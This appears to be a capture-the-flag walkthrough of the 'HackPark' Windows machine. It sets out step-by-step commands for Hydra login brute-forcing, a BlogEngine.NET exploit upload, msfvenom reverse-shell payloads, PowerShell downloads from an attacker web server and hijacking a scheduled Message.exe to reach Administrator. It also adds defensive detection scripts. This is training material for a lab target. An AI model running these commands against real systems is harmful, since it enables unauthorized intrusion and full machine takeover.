HackPark

Bruteforce a website's login with Hydra, identify and use a public exploit, then escalate your privileges on this Windows machine!

Tags: Windows, CVE, RCE, Metasploit, winPEAS, Hydra

Used Commands

hydra -l <username> -P <path to wordlist> <target ip> http-post-form <payload>
searchsploit <search name>
nc -lvnp <listener port>
python3 -m http.server <webserver port>

msfvenom --list payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<listener ip> LPORT=<listener port> -f exe > shell.exe
msfvenom -p windows/shell_reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<listener ip> LPORT=<listener port> -f exe -o <output filename>
msfvenom -p <payload> -a <architecture> --encoder x86/shikata_ga_nai LHOST=<listener ip> LPORT=<listener port> -f exe -o <output filename>
getuid
powershell -c "Invoke-WebRequest -Uri 'http://<webserver ip>:<webserver port>/<filename>' -OutFile '<output filename>'"
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<webserver ip>:<webserver port>/<filename>','<output filename>')"
ren <filename> <new filename>

Task 1

Google:
Who’s the clown?

A quick search in the page's source code didn't give me any hints.
So I searched on Google and finally found the name.

Task 2

Find the login page in the menu. This gives us some more knowledge about the components in use.

Hydra:
Brute-forcing a password

Before I started using Hydra, I did a quick search on Google and tried to find some default credentials.

Username   Password
admin      admin
admin      Passw@rd123

Unfortunately, this didn't work out, so let's continue with Hydra.

hydra -l admin -P /usr/share/wordlists/rockyou.txt <target ip> http-post-form <payload>

Parameter   Description
-l          <username>
-P          <wordlist>
<payload>   everything from __VIEWSTATE=... to ...LoginButton=Log+in (check the following screenshot)

If everything worked, you should receive something like this:

[80][http-post-form] host: 10.10.9.86   login: admin   password: 1qaxxxxx
1 of 1 target successfully completed, 1 valid password found
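What this brute force looks like from the server side, as an added defensive example that is not part of the original write-up: a detector over constructed IIS W3C log lines that flags a client sending a burst of failed login POSTs and records whether a successful login followed. The login path /Account/login.aspx and the 200-on-failure / 302-on-success behaviour of ASP.NET forms login are assumptions, not taken from the page.

```python
# Added defensive example (not from the write-up): spot a Hydra-style burst of
# failed login POSTs in IIS W3C log lines. Input is constructed; the login path
# and the 200-on-failure / 302-on-success convention are assumptions.
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/account/login.aspx"   # assumed; compared case-insensitively
WINDOW = timedelta(seconds=60)
THRESHOLD = 10                       # failed POSTs per client within WINDOW

def constructed_log():
    """Constructed sample: one Hydra-like burst, one normal login, one user with typos."""
    lines = [f"2021-04-18 10:00:{5 + i // 3:02d} POST /Account/login.aspx 10.10.9.1 200"
             for i in range(12)]
    lines.append("2021-04-18 10:00:09 POST /Account/login.aspx 10.10.9.1 302")
    lines += ["2021-04-18 10:01:30 POST /Account/login.aspx 10.10.9.2 302",
              "2021-04-18 10:02:00 POST /Account/login.aspx 10.10.9.3 200",
              "2021-04-18 10:02:20 POST /Account/login.aspx 10.10.9.3 200",
              "2021-04-18 10:02:41 POST /Account/login.aspx 10.10.9.3 302"]
    return "\n".join(lines)

def parse(line):
    """W3C fields used here: date time cs-method cs-uri-stem c-ip sc-status."""
    date, time, method, uri, ip, status = line.split()
    return datetime.fromisoformat(f"{date} {time}"), method, uri, ip, int(status)

def detect_bruteforce(log_text, threshold=THRESHOLD, window=WINDOW):
    """Return {ip: {"failed": n, "success_after": bool}} for clients that sent at
    least `threshold` failed login POSTs inside a sliding `window`; success_after
    is True when a 302 (login succeeded) follows the burst."""
    recent = defaultdict(deque)      # ip -> failed-POST timestamps inside window
    failed = defaultdict(int)        # ip -> total failed POSTs seen
    flagged = {}
    for raw in log_text.splitlines():
        if not raw or raw.startswith("#"):      # W3C header/comment lines
            continue
        ts, method, uri, ip, status = parse(raw)
        if method != "POST" or uri.lower() != LOGIN_PATH:
            continue
        if status == 302:                        # redirect = successful login
            if ip in flagged:
                flagged[ip]["success_after"] = True
            continue
        failed[ip] += 1                          # anything else re-rendered the form
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:                # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold:
            flagged.setdefault(ip, {"failed": 0, "success_after": False})
        if ip in flagged:
            flagged[ip]["failed"] = failed[ip]
    return flagged
```

A flagged client with success_after set is the case worth paging on: the burst found a valid password, so the account needs a reset, not just a block.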

Burp-Suite:
Brute-forcing a password

Burp Suite's Intruder is another option for guessing passwords. The source code of the login page shows that this login seems to be for an administrator. So I decided to start with “admin” as the username and any password wordlist you can find.

You should give it a try.

Burp-Suite:
Request type of login form

Check out the source code of the web page or, if you used Burp Suite, check the request when you try to log in with any credentials.

Task 3

Check out the about page from the sidebar to find the current version of BlogEngine.

SearchSploit: Find exploits

What is the CVE Version? You will get multiple results when you search for BlogEngine.NET.

searchsploit BlogEngine.NET
[Screenshot: result of the searchsploit search]

Three of them concern remote code execution (which is what we are after), but only one of them works. Go and find the right one or try them all.

Gain a reverse shell

Copy the file to your working directory. [Screenshot: copying the exploit file to the working directory]

Before we answer the next question we need to gain access to the server. Let's run that exploit:

vim 46353.cs
  • Change the <listener ip> and <listener port> in the exploit file. [Screenshot: changes on the exploit file, IP and port]

  • Set up a netcat listener on that port: nc -lvnp <listener port>

  • Rename the exploit file to PostView.ascx

  • Upload the file to the target server by editing a post (read the exploit description):
    http://<target ip>/admin/app/editor/editpost.cshtml [Screenshot: the icon used to upload a file] [Screenshot: confirmation that the file was uploaded]

  • Use the browser to access the base URL like so:
    http://<target ip>/?theme=../../App_Data/files

Who is the web server running as?

Running whoami in the established reverse shell answers this question: iis apppool\blog

Task 4 (Metasploit)

Compromise the machine

Let’s create a better shell using msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<listener ip> LPORT=9001 -f exe > shell.exe
[Screenshot: creation of the reverse shell executable with msfvenom]

Set up an http.server on the attacker machine. I used python3 and http.server for this.

python3 -m http.server 8000

Use the existing reverse shell and download the shell.exe on the victim machine using PowerShell.

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<webserver ip>:8000/shell.exe','shell.exe')"
[Screenshot: python3 web server on port 8000]

Before executing shell.exe, let's start Metasploit and set up a handler for windows/meterpreter/reverse_tcp:

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp

Check options and set the required parameters.

set LHOST <atk ip>
set LPORT 9001
run
[Screenshot: options on the Metasploit multi/handler with the meterpreter/reverse_tcp payload]

Use run to start the listener. If everything is correct you should now see a message like this:

[*] Started reverse TCP handler on 10.10.219.52:9001

Run shell.exe on the victim machine:

shell.exe
[Screenshot: incoming connection from the target]

What’s the OS version?

As soon as you are connected with the new meterpreter shell, run sysinfo to get the OS version. [Screenshot: printed sysinfo]

WinPEAS:
Enumeration

If you do not have winPEAS stored on your machine yet, get it now. A quick search on Google will give you all the information you need.

Use the same method as used in the last step to get winPEAS.bat transferred to the target machine.

Switch to the meterpreter shell and download it:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<webserver ip>:8000/winPEAS.bat','winPEAS.bat')"
[Screenshot: list of files in the temp folder]

Run winPEAS.bat.

Any suspicious service running?

Have a look at the output of winPEAS (the RUNNING PROCESSES section is what we are looking for):

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] RUNNING PROCESSES <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Something unexpected is running? Check for vulnerabilities
 [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
smss.exe                       376 N/A
csrss.exe                      524 N/A
csrss.exe                      580 N/A
wininit.exe                    588 N/A
winlogon.exe                   616 N/A
services.exe                   680 N/A
lsass.exe                      688 SamSs
svchost.exe                    748 BrokerInfrastructure, DcomLaunch, LSM,
                                   PlugPlay, Power, SystemEventsBroker
svchost.exe                    792 RpcEptMapper, RpcSs
dwm.exe                        872 N/A
svchost.exe                    888 Dhcp, EventLog, lmhosts, Wcmsvc
svchost.exe                    916 AeLookupSvc, CertPropSvc, DsmSvc, gpsvc,
                                   iphlpsvc, LanmanServer, ProfSvc, Schedule,
                                   SENS, SessionEnv, ShellHWDetection, Themes,
                                   Winmgmt
svchost.exe                    972 EventSystem, FontCache, netprofm, nsi,
                                   W32Time, WinHttpAutoProxySvc
svchost.exe                    360 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc, WinRM
svchost.exe                    848 BFE, DPS, MpsSvc
spoolsv.exe                   1148 Spooler
amazon-ssm-agent.exe          1180 AmazonSSMAgent
svchost.exe                   1256 AppHostSvc
LiteAgent.exe                 1276 AWSLiteAgent
svchost.exe                   1372 TrkWks, UALSVC, UmRdpService
svchost.exe                   1388 W3SVC, WAS
WService.exe                  1416 WindowsScheduler
WScheduler.exe                1556 N/A
Ec2Config.exe                 1656 Ec2Config
WmiPrvSE.exe                  1748 N/A
svchost.exe                   1432 TermService
taskhostex.exe                2584 N/A
explorer.exe                  2656 N/A
ServerManager.exe             2360 N/A
WScheduler.exe                1804 N/A
msdtc.exe                     1888 MSDTC
w3wp.exe                      2520 N/A
cmd.exe                       1564 N/A
conhost.exe                   2116 N/A
shell.exe                     1860 N/A
cmd.exe                       2132 N/A
conhost.exe                    924 N/A
WmiPrvSE.exe                  1864 N/A
TrustedInstaller.exe          1948 TrustedInstaller
TiWorker.exe                  1356 N/A
tasklist.exe                  2668 N/A

WService.exe (the WindowsScheduler service) and WScheduler.exe stand out in that list. Head over to the SystemScheduler folder.

cd "c:\Program Files (x86)\SystemScheduler"

Check out the read, write and execute permissions: every file in the folder is writable by everyone. That looks great!

meterpreter > ls
Listing: c:\Program Files (x86)\SystemScheduler
===============================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40777/rwxrwxrwx   4096     dir   2019-08-04 11:36:53 +0000  Events
100666/rw-rw-rw-  60       fil   2019-08-04 11:36:42 +0000  Forum.url
100666/rw-rw-rw-  9813     fil   2019-08-04 11:36:42 +0000  License.txt
100666/rw-rw-rw-  1496     fil   2019-08-04 11:37:02 +0000  LogFile.txt
100666/rw-rw-rw-  3760     fil   2019-08-04 11:36:53 +0000  LogfileAdvanced.txt
100777/rwxrwxrwx  536992   fil   2019-08-04 11:36:42 +0000  Message.exe
100777/rwxrwxrwx  445344   fil   2019-08-04 11:36:42 +0000  PlaySound.exe
100777/rwxrwxrwx  27040    fil   2019-08-04 11:36:42 +0000  PlayWAV.exe
100666/rw-rw-rw-  149      fil   2019-08-04 11:36:53 +0000  Preferences.ini
100777/rwxrwxrwx  485792   fil   2019-08-04 11:36:42 +0000  Privilege.exe
100666/rw-rw-rw-  10100    fil   2019-08-04 11:36:42 +0000  ReadMe.txt
100777/rwxrwxrwx  112544   fil   2019-08-04 11:36:42 +0000  RunNow.exe
100777/rwxrwxrwx  235936   fil   2019-08-04 11:36:42 +0000  SSAdmin.exe
100777/rwxrwxrwx  731552   fil   2019-08-04 11:36:42 +0000  SSCmd.exe
100777/rwxrwxrwx  456608   fil   2019-08-04 11:36:42 +0000  SSMail.exe
100777/rwxrwxrwx  1633696  fil   2019-08-04 11:36:42 +0000  Scheduler.exe
100777/rwxrwxrwx  491936   fil   2019-08-04 11:36:42 +0000  SendKeysHelper.exe
100777/rwxrwxrwx  437664   fil   2019-08-04 11:36:42 +0000  ShowXY.exe
100777/rwxrwxrwx  439712   fil   2019-08-04 11:36:42 +0000  ShutdownGUI.exe
100666/rw-rw-rw-  785042   fil   2019-08-04 11:36:42 +0000  WSCHEDULER.CHM
100666/rw-rw-rw-  703081   fil   2019-08-04 11:36:42 +0000  WSCHEDULER.HLP
100777/rwxrwxrwx  136096   fil   2019-08-04 11:36:42 +0000  WSCtrl.exe
100777/rwxrwxrwx  68512    fil   2019-08-04 11:36:42 +0000  WSLogon.exe
100666/rw-rw-rw-  33184    fil   2019-08-04 11:36:42 +0000  WSProc.dll
100666/rw-rw-rw-  2026     fil   2019-08-04 11:36:42 +0000  WScheduler.cnt
100777/rwxrwxrwx  331168   fil   2019-08-04 11:36:42 +0000  WScheduler.exe
100777/rwxrwxrwx  98720    fil   2019-08-04 11:36:42 +0000  WService.exe
100666/rw-rw-rw-  54       fil   2019-08-04 11:36:42 +0000  Website.url
100777/rwxrwxrwx  76704    fil   2019-08-04 11:36:42 +0000  WhoAmI.exe
100666/rw-rw-rw-  1150     fil   2019-08-04 11:36:42 +0000  alarmclock.ico
100666/rw-rw-rw-  766      fil   2019-08-04 11:36:42 +0000  clock.ico
100666/rw-rw-rw-  80856    fil   2019-08-04 11:36:42 +0000  ding.wav
100666/rw-rw-rw-  1637972  fil   2019-08-04 11:36:42 +0000  libeay32.dll
100777/rwxrwxrwx  40352    fil   2019-08-04 11:36:42 +0000  sc32.exe
100666/rw-rw-rw-  766      fil   2019-08-04 11:36:42 +0000  schedule.ico
100666/rw-rw-rw-  355446   fil   2019-08-04 11:36:42 +0000  ssleay32.dll
100666/rw-rw-rw-  6999     fil   2019-08-04 11:36:42 +0000  unins000.dat
100777/rwxrwxrwx  722597   fil   2019-08-04 11:36:42 +0000  unins000.exe
100666/rw-rw-rw-  6574     fil   2019-08-04 11:36:42 +0000  whiteclock.ico

Let's dig deeper into the Events folder and check some log files.

meterpreter > cd Events
meterpreter > ls
Listing: c:\Program Files (x86)\SystemScheduler\Events
======================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  1926   fil   2019-08-04 22:05:19 +0000  20198415519.INI
100666/rw-rw-rw-  27140  fil   2019-08-04 22:06:01 +0000  20198415519.INI_LOG.txt
100666/rw-rw-rw-  290    fil   2020-10-02 21:50:12 +0000  2020102145012.INI
100666/rw-rw-rw-  186    fil   2021-04-18 10:02:05 +0000  Administrator.flg
100666/rw-rw-rw-  182    fil   2021-04-18 10:01:36 +0000  SYSTEM_svc.flg
100666/rw-rw-rw-  0      fil   2021-04-18 10:02:05 +0000  Scheduler.flg
100666/rw-rw-rw-  449    fil   2019-08-04 11:36:53 +0000  SessionInfo.flg
100666/rw-rw-rw-  0      fil   2021-04-18 10:01:36 +0000  service.flg

While checking the log files you will find this:

meterpreter > cat 20198415519.INI_LOG.txt
...
04/18/21 04:13:34,Process Ended. PID:2376,ExitCode:4,Message.exe (Administrator)
04/18/21 04:14:01,Event Started Ok, (Administrator)
04/18/21 04:14:34,Process Ended. PID:2880,ExitCode:4,Message.exe (Administrator)
04/18/21 04:15:01,Event Started Ok, (Administrator)
04/18/21 04:15:33,Process Ended. PID:2604,ExitCode:4,Message.exe (Administrator)
04/18/21 04:16:01,Event Started Ok, (Administrator)
04/18/21 04:16:33,Process Ended. PID:2556,ExitCode:4,Message.exe (Administrator)
04/18/21 04:17:00,Event Started Ok, (Administrator)
04/18/21 04:17:34,Process Ended. PID:2400,ExitCode:4,Message.exe (Administrator)
04/18/21 04:18:01,Event Started Ok, (Administrator)
04/18/21 04:18:34,Process Ended. PID:2956,ExitCode:4,Message.exe (Administrator)
04/18/21 04:19:01,Event Started Ok, (Administrator)
meterpreter >

There is a task running every 30 seconds. Check the user: every run is logged as Administrator. Great! Let's get root now.
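The reasoning above, turned into a small audit script as an added example (not code from the write-up): it parses a meterpreter ls listing and a SystemScheduler event log in the formats shown and reports binaries that a privileged account executes but that anyone can overwrite. The inputs are constructed; Locked.exe and the blog account entry are invented for contrast.

```python
# Added audit example (not from the write-up): combine a meterpreter 'ls'
# listing with a SystemScheduler event log and report world-writable
# executables that a privileged account runs. Both inputs are constructed.
import re

LISTING = """\
100777/rwxrwxrwx  536992   fil   2019-08-04 11:36:42 +0000  Message.exe
100777/rwxrwxrwx  485792   fil   2019-08-04 11:36:42 +0000  Privilege.exe
100555/r-xr-xr-x  12345    fil   2019-08-04 11:36:42 +0000  Locked.exe
100666/rw-rw-rw-  1496     fil   2019-08-04 11:37:02 +0000  LogFile.txt
"""

EVENT_LOG = """\
04/18/21 04:13:34,Process Ended. PID:2376,ExitCode:4,Message.exe (Administrator)
04/18/21 04:14:01,Event Started Ok, (Administrator)
04/18/21 04:14:34,Process Ended. PID:2880,ExitCode:4,Message.exe (Administrator)
04/18/21 04:14:40,Process Ended. PID:2881,ExitCode:0,Locked.exe (Administrator)
04/18/21 04:15:02,Process Ended. PID:2900,ExitCode:0,Message.exe (blog)
"""

ENDED = re.compile(r"Process Ended\. PID:\d+,ExitCode:-?\d+,(\S+) \(([^)]+)\)")

def parse_listing(text):
    """Map file name -> symbolic permission string from a meterpreter ls listing."""
    modes = {}
    for line in text.splitlines():
        parts = line.split(None, 6)            # mode size type date time tz name
        if len(parts) == 7 and "/" in parts[0]:
            modes[parts[6]] = parts[0].split("/", 1)[1]
    return modes

def world_writable(perms):
    """'rwxrwxrwx' -> the 'other' write bit is the second-to-last character."""
    return len(perms) == 9 and perms[-2] == "w"

def runs_by_account(text):
    """Map executable -> set of accounts the scheduler ran it as."""
    runs = {}
    for m in ENDED.finditer(text):
        runs.setdefault(m.group(1), set()).add(m.group(2))
    return runs

def writable_privileged_binaries(listing, log, privileged=("Administrator", "SYSTEM")):
    """Sorted (binary, account) pairs: privileged runs of files anyone can overwrite."""
    modes = parse_listing(listing)
    hits = set()
    for exe, accounts in runs_by_account(log).items():
        if world_writable(modes.get(exe, "")):
            hits.update((exe, a) for a in accounts if a in privileged)
    return sorted(hits)

if __name__ == "__main__":
    for exe, account in writable_privileged_binaries(LISTING, EVENT_LOG):
        print(f"{exe} is world-writable and runs as {account}")
```

Privilege.exe is writable but never executed and Locked.exe is executed but not writable, so only Message.exe is reported; the fix on the defender side is to tighten the ACL on the scheduler folder or run the task as a low-privilege account.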

Root the machine

Replace Message.exe with our renamed shell.exe. Use the Python web server set up earlier to download the shell into the SystemScheduler folder:

meterpreter > shell
Process 2628 created.
Channel 8 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
c:\Program Files (x86)\SystemScheduler>powershell -c "Invoke-WebRequest -Uri 'http://<webserver ip>:8000/shell.exe' -OutFile 'c:\Program Files (x86)\SystemScheduler\shell.exe'"

In Metasploit:

  • Background the current channel (ctrl + z):
    c:\Program Files (x86)\SystemScheduler>^Z
    Background channel 8? [y/N]  y
    meterpreter > pwd
    c:\Program Files (x86)\SystemScheduler

  • Rename Message.exe to Message.exe.bak:
    meterpreter > mv Message.exe Message.exe.bak

  • Rename shell.exe to Message.exe:
    meterpreter > mv shell.exe Message.exe

  • Background the current session (ctrl + z) and run the previous multi/handler again:
    meterpreter >
    Background session 1? [y/N]  y
    [-] Unknown command: y.
    msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.219.52:9001

Within 30 seconds WindowsScheduler will run Message.exe, which we replaced with our msfvenom shell.exe. As the task is executed as Administrator, the reverse shell comes back with those permissions.

[*] Sending stage (176195 bytes) to 10.10.75.91
[*] Meterpreter session 2 opened (10.10.219.52:9001 -> 10.10.75.91:49304) at 2021-04-18 11:30:01 +0000

meterpreter > getuid
Server username: HACKPARK\Administrator

Congrats! You have root.

Task 5 (w/o Metasploit)

Use the same exploit as in Task 3 to gain an initial reverse shell. Set up a netcat listener with nc -lvnp 4445.

root@kali:~/Desktop/HackPark# nc -lvnp 4445
listening on [any] 4445 ...

Use the browser to establish the initial reverse shell (upload and trigger the exploit as in Task 3):
http://<target ip>/admin/app/editor/editpost.cshtml

listening on [any] 4445 ...
connect to [10.10.219.52] from (UNKNOWN) [10.10.75.91] 49313
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

Compromise the machine

The goal is to get root using windows/shell_reverse_tcp (instead of the meterpreter payload used in Task 4). Create a shell.exe with this different payload.

root@kali:~/Desktop/HackPark# msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=10.10.219.52 LPORT=9001 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] Skipping invalid encoder /x86/shikata_ga_nai
[!] Couldn't find encoder to use
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe

Move the file to the target. A simple http.server will do for this.

On your attacker machine:

root@kali:~/Desktop/HackPark# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Root the machine

Switch to the victim’s machine and change the current directory to c:\Program Files (x86)\SystemScheduler.

cd c:\Program Files (x86)\SystemScheduler

Download the generated shell.exe and winPEAS.bat onto the victim machine:

powershell -c "Invoke-WebRequest -Uri 'http://<webserver ip>:8000/shell.exe' -OutFile 'shell.exe'"
powershell -c "Invoke-WebRequest -Uri 'http://<webserver ip>:8000/winPEAS.bat' -OutFile 'winPEAS.bat'"

Start a netcat listener on your machine. For better stability, I used rlwrap around netcat.

root@kali:~/Desktop/HackPark# rlwrap nc -lvnp 9001
listening on [any] 9001 ...

Rename Message.exe:

c:\Program Files (x86)\SystemScheduler>ren "Message.exe" "Message.exe.bak"

Finally, rename the uploaded shell.exe on the target machine to Message.exe:

c:\Program Files (x86)\SystemScheduler>ren "shell.exe" "Message.exe"

Wait for WindowsScheduler to run our new Message.exe:

root@kali:~# rlwrap nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.219.52] from (UNKNOWN) [10.10.181.219] 49214
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\PROGRA~2\SYSTEM~1>echo %username%
echo %username%
Administrator

Congrats! You have root.